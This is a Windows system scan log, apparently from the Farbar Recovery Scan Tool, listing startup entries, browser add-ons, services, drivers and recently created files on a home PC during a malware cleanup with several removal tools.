(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [396688 2015-07-18] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508240 2015-08-05] (Adobe Systems Incorporated)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [14601160 2015-07-02] (Logitech Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-09-15] (Apple Inc.)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\cnext.exe [4867784 2015-12-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-26] (Intel Corporation)
HKLM-x32\...\Run: [Logitech G35] => D:\G35.exe
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5515496 2015-07-02] (Avast Software s.r.o.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [591512 2015-11-19] (Razer Inc.)
HKLM-x32\...\Run: [QuickTime Task] => D:\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46952 2011-08-02] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [30568 2011-08-02] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139776 2014-06-16] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => "D:\LogMeIn\hamachi-2-ui.exe" --auto-start
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595504 2016-01-29] (Oracle Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4127488 2015-06-16] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Steam] => D:\Steam\steam.exe [3014224 2016-02-05] (Valve Corporation)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [InternodeUsage] => D:\Internode\mum.exe [2242560 2014-12-04] (Angus Johnson)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Spotify Web Helper] => C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2355312 2016-02-19] (Spotify Ltd)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [f.lux] => C:\Users\Kym\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-24] (Flux Software LLC)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2015-07-02] (Avast Software s.r.o.)
Startup: C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Open Broadcaster Software (32bit) (2).lnk [2015-08-20]
ShortcutTarget: Open Broadcaster Software (32bit) (2).lnk -> C:\Program Files (x86)\OBS\OBS.exe ()
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> D:\Microsoft Office 2013\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2015-07-02] (Avast Software s.r.o.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll [2009-02-06] (Zeon Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\ssv.dll [2016-02-25] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2015-07-02] (Avast Software s.r.o.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\jp2ssv.dll [2016-02-25] (Oracle Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - D:\Microsoft Office 2013\Office15\MSOSB.DLL [2015-02-17] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

FireFox:
========
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> D:\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2014-04-28] (Adobe Systems)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [No File]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [No File]
FF Plugin-x32: @java.com/DTPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\dtplugin\npDeployJava1.dll [2016-02-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\plugin2\npjp2.dll [2016-02-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-18] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-19] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2014-04-28] (Adobe Systems)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-11-18] (Microsoft Corporation)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2015-12-10]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.youtube.com/feed/subscriptions","hxxp://imgur.com/","hxxps://www.netflix.com/","hxxp://twitch.tv/"
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => No File
CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Profile: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (YouTube) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Adblock Plus) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-02-26]
CHR Extension: (Google Search) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-26]
CHR Extension: (Gmail) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2015-07-02]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeActiveFileMonitor11.0; D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-17] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2020056 2016-02-09] (Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-09-02] (Apple Inc.)
S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-07] ()
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [343336 2015-07-02] (Avast Software s.r.o.)
R3 AvastVBoxSvc; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [4034896 2015-07-02] (Avast Software)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2014-05-04] () [File not signed]
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [File not signed]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [351120 2015-07-18] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
S2 MBAMService; D:\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 PAExec; C:\Windows\PAExec.exe [190464 2014-10-18] (Power Admin LLC) [File not signed]
R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [145256 2011-08-02] (Nuance Communications, Inc.)
R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [54272 2015-12-18] (Razer Inc.) [File not signed]
R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-11-05] ()
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1750712 2015-06-16] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2102496 2015-06-16] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [224712 2015-07-24] (Safer-Networking Ltd.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
S2 Hamachi2Svc; D:\LogMeIn\hamachi-2.exe -s [X]
S2 jhi_service; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe" [X]
S2 LMS; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe" [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-29] (Advanced Micro Devices, Inc.)
R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [22240 2013-10-28] ()
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29168 2015-07-02] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [89944 2015-07-02] (Avast Software s.r.o.)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2015-07-02] (Avast Software s.r.o.)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65736 2015-07-02] ()
S1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1047320 2015-07-02] (Avast Software s.r.o.)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [442264 2015-07-02] (Avast Software s.r.o.)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [137288 2015-07-02] (Avast Software s.r.o.)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [272248 2015-07-02] ()
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-09-18] (Advanced Micro Devices)
S3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2015-11-12] (LogMeIn Inc.)
S3 LADF_DHP2; C:\Windows\system32\DRIVERS\ladfDHP2amd64.sys [62168 2010-09-29] (Logitech)
S3 LADF_SBVM; C:\Windows\system32\DRIVERS\ladfSBVMamd64.sys [377176 2010-09-29] (Logitech)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech)
R3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Logitech Inc.)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [895256 2015-06-23] (Realtek )
S3 rzdaendpt; C:\Windows\System32\drivers\rzdaendpt.sys [43720 2015-08-14] (Razer Inc)
S3 rzendpt; C:\Windows\System32\drivers\rzendpt.sys [50392 2015-08-14] (Razer Inc)
R3 rzmpos; C:\Windows\System32\drivers\rzmpos.sys [48840 2015-08-14] (Razer Inc)
R2 rzpmgrk; C:\WINDOWS\system32\drivers\rzpmgrk.sys [37184 2015-09-23] (Razer, Inc.)
R2 rzpnk; C:\WINDOWS\system32\drivers\rzpnk.sys [130880 2015-12-15] (Razer, Inc.)
S3 rzvkeyboard; C:\Windows\System32\drivers\rzvkeyboard.sys [44232 2015-08-14] (Razer Inc)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
R2 VBoxAswDrv; C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [273824 2015-07-02] (Avast Software)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
R3 XtuAcpiDriver; C:\Windows\System32\drivers\XtuAcpiDriver.sys [63840 2015-06-06] (Intel Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-01 21:57 - 2016-03-01 22:10 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-03-01 21:55 - 2016-03-01 21:55 - 00000000 ____D C:\Users\Kym\Downloads\mbar-1.09.3.1001
2016-03-01 21:53 - 2016-03-01 21:55 - 00000000 ____D C:\Users\Kym\Desktop\mbar-1.09.3.1001
2016-03-01 21:52 - 2016-03-01 21:54 - 16563352 _____ (Malwarebytes Corp.) C:\Users\Kym\Downloads\mbar-1.09.3.1001.exe
2016-03-01 21:48 - 2016-03-01 21:48 - 00016148 _____ C:\WINDOWS\system32\KYM-PC_Kym_HistoryPrediction.bin
2016-03-01 12:40 - 2016-03-01 21:57 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-03-01 12:40 - 2016-03-01 21:56 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-03-01 12:40 - 2016-03-01 12:40 - 00000692 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-01 12:40 - 2016-03-01 12:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-01 12:40 - 2016-03-01 12:40 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-01 12:40 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-03-01 12:40 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-03-01 12:39 - 2016-03-01 12:39 - 00000159 _____ C:\Users\Kym\Desktop\ckfiles.txt
2016-03-01 12:36 - 2016-03-01 12:36 - 00001001 _____ C:\Users\Kym\Desktop\JRT.txt
2016-03-01 12:33 - 2016-03-01 12:33 - 00005519 _____ C:\Users\Kym\Desktop\AdwCleaner[C1].txt
2016-03-01 12:27 - 2016-03-01 12:31 - 00000000 ____D C:\AdwCleaner
2016-03-01 12:24 - 2016-03-01 12:39 - 22908888 _____ (Malwarebytes ) C:\Users\Kym\Desktop\mbam-setup-2-2-0-1024.exe
2016-03-01 12:24 - 2016-03-01 12:38 - 00468480 _____ () C:\Users\Kym\Desktop\CKScanner.exe
2016-03-01 12:23 - 2016-03-01 12:34 - 01609216 _____ (Malwarebytes) C:\Users\Kym\Desktop\JRT.exe
2016-03-01 12:21 - 2016-03-01 12:27 - 01518592 _____ C:\Users\Kym\Desktop\AdwCleaner.exe
2016-03-01 12:19 - 2016-03-01 12:20 - 00016163 _____ C:\Users\Kym\Desktop\Fixlog.txt
2016-02-29 20:50 - 2016-02-29 20:50 - 00002245 _____ C:\Users\Kym\Desktop\aswMBR.txt
2016-02-29 20:50 - 2016-02-29 20:50 - 00000512 _____ C:\Users\Kym\Desktop\MBR.dat
2016-02-29 20:46 - 2016-03-01 22:11 - 00026829 _____ C:\Users\Kym\Desktop\FRST.txt
2016-02-29 20:46 - 2016-02-29 20:47 - 00072356 _____ C:\Users\Kym\Desktop\Addition.txt
2016-02-29 20:43 - 2016-03-01 22:11 - 00000000 ____D C:\FRST
2016-02-29 20:39 - 2016-02-29 20:39 - 00002342 _____ C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2016-02-29 20:39 - 2016-02-29 20:39 - 00000207 _____ C:\WINDOWS\tweaking.com-regbackup-KYM-PC-Windows-10-Home-(64-bit).dat
2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\RegBackup
2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\Program Files (x86)\Tweaking.com
2016-02-29 20:38 - 2016-02-29 20:47 - 05198336 _____ (AVAST Software) C:\Users\Kym\Desktop\aswMBR.exe
2016-02-29 20:38 - 2016-02-29 20:39 - 00016377 _____ C:\WINDOWS\Tweaking.com - Registry Backup Setup Log.txt
2016-02-29 20:36 - 2016-02-29 20:43 - 02371072 _____ (Farbar) C:\Users\Kym\Desktop\FRST64.exe
2016-02-29 20:35 - 2016-02-29 20:38 - 04777232 _____ (Tweaking.com) C:\Users\Kym\Downloads\tweaking.com_registry_backup_setup.exe
2016-02-29 19:37 - 2016-02-29 20:31 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2016-02-29 19:34 - 2016-02-29 19:34 - 00000000 ____D C:\WINDOWS\pss
2016-02-28 21:02 - 2016-01-08 22:44 - 00000822 _____ C:\WINDOWS\system32\Drivers\etc\hosts.20160228-210203.backup
2016-02-28 18:59 - 2016-02-28 18:59 - 00000000 ____D C:\Program Files\Common Files\AV
2016-02-28 18:50 - 2016-02-28 21:01 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-02-28 18:50 - 2016-02-28 20:23 - 00001494 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2016-02-28 18:50 - 2016-02-28 18:50 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2016-02-28 18:50 - 2015-06-16 17:32 - 00020760 _____ (Safer-Networking Ltd.) C:\WINDOWS\system32\sdnclean64.exe
